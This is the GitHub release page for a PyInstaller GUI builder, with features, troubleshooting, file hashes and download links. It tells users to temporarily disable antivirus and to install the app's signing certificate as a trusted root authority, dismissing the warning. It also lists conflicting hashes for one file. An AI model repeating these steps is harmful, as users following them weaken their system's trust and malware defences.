Skip to content

Releases: KernFerm/Bubbles-PyInstaller-Forge

application.zip

03 Jul 04:54
bc130f1

Choose a tag to compare

🧊 Bubbles PyInstaller Forge: Secure Builder

💬 Join our Discord for support & community: https://discord.gg/zQbJJgwbUv

A modern, secure, and user-friendly GUI for building Python executables with PyInstaller. Built with CustomTkinter for a beautiful and accessible experience.

✨ Features

  • ⚡ Real-time build progress and output
  • 🔍 PyPI package search/autocomplete for hidden imports
  • 🖥️ Modern, accessible UI with keyboard navigation
  • 💾 Output log saving and 🧹 clear output button
  • 🛡️ Security checks (admin/root, world-writable dir, input validation)
  • 🚨 Error dialogs and validation for user actions
  • 🧊 No drag & drop: File selection is now via a secure button for maximum compatibility

🆕 What's New

  • Drag & drop support has been removed for improved stability and compatibility
  • Splash/loading screen logic improved and can be toggled as needed
  • Window centering and startup behavior fixed for better OS compatibility
  • Many bug fixes and UI improvements for a smoother experience
  • Discord support link added to the Help menu

🧑‍💻 How to Use BubblesPyInstallerForge.exe (No Python Needed)

If you received only the BubblesPyInstallerForge.exe file (no Python script required):

Requirements:

  • Windows 10 or newer (64-bit recommended)
  • No Python installation or extra dependencies needed
  1. Just double-click the .exe
    • No installation or setup is needed. You do not need Python installed.
  2. The app will open
    • Use the graphical interface to select and build your own Python scripts into executables.
  3. No dependencies required
    • All necessary libraries are bundled inside the .exe.
  4. Troubleshooting
    • If you see errors about missing DLLs, try running on a different Windows machine or contact the provider for help.

🛠️ Troubleshooting & Help

  • App won't start or GUI is blank:

    • If you are using the .exe, you do NOT need Python installed. If you are running the .py version, make sure you are using Python 3.8 or newer (Python 3.11+ recommended).
  • Build fails or no .exe is produced:

    • Check the build output for error messages.
    • Make sure your script runs without errors before building.
    • Some packages may require extra hidden imports—add them using the search or checkboxes.
    • If antivirus blocks the build, temporarily disable it or whitelist the output folder.
  • PyInstaller not found:

    • Only relevant if running the .py version. Install it with pip install pyinstaller and ensure it's in your PATH.
  • Permission or security errors:

    • Do not run the app as administrator/root unless necessary.
    • Avoid running from world-writable or system directories.
  • Other issues:

    • Check the app_security.log file for details (if present).
    • Try running the app from a terminal/command prompt to see error messages.
    • If you need more help, open an issue or ask in the relevant Python/CustomTkinter community.
    • Join our Discord for help: https://discord.gg/zQbJJgwbUv

Note:
This tool is only for making Windows .exe applications from Python scripts using PyInstaller. It does not apply PyArmor or any code obfuscation to your scripts. If you want to protect or obfuscate your code, you must use PyArmor (or similar tools) on your scripts yourself before building with Bubbles PyInstaller Forge.


🎉 Enjoy secure, modern Python executable building with Bubbles PyInstaller Forge! 🧊

============

BubblesPyInstallerForge.exe

SHA256 691F5CFE6348B6F26FC94872C8B2233C985EE574DE3E67CB74D87B8DDF8A87CD

  • SHA256 3626E9025188DEB43DD69D99AED905815131471283DABB53837C4A497B8D6A79
    ============================================================

autosetup.exe

  • SHA256 8416D0454EE0B785D1F0E6990A81CFAEA3DFF4A22E2FBECE683A7DFF9A63753B

============================================================

🖥 Executable (.exe) Version

This version of the game has been bundled into an executable (.exe) file for easier distribution and use on Windows.

BubblesPyInstallerForge.exe

SHA256 691F5CFE6348B6F26FC94872C8B2233C985EE574DE3E67CB74D87B8DDF8A87CD

  • SHA256 3626E9025188DEB43DD69D99AED905815131471283DABB53837C4A497B8D6A79

============================================================

============================================================

autosetup.exe

  • SHA256 8416D0454EE0B785D1F0E6990A81CFAEA3DFF4A22E2FBECE683A7DFF9A63753B

IMPORTANT BELOW PLEASE DO!!!!

To verify the digital signature of your application executable:

1. Right-click on the executable file.

2. Select Properties.

3. Go to the Digital Signatures tab.

  • click the timestamp date Thursday

4. Click on Details.

  • click view certificate

5. Click Install Certificate

  • click current user , click next.

6. Place All Certificates In The Following Store

  • click Browse

7. Trusted Root Certification Authorities

  • click OK

8. The certificate will be imported after you click Finish.

  • click Finish

9. repeat step number 3. Go to the Digital Signatures tab.

  • click the timestamp date Thursday

  • you will see a warning message pop up click yes

10. Verify if the signature is valid.

  • This digital signature is OK.

Click To Here To Download BubblesPyInstallerForge.exe

Full Changelog: https://github.com/KernFerm/Bubbles-PyInstaller-Forge/commits/application.zip

IF YOU HAVE ISSUES USE THE autosetup.exe to install the necessary dependencies or setup for the exe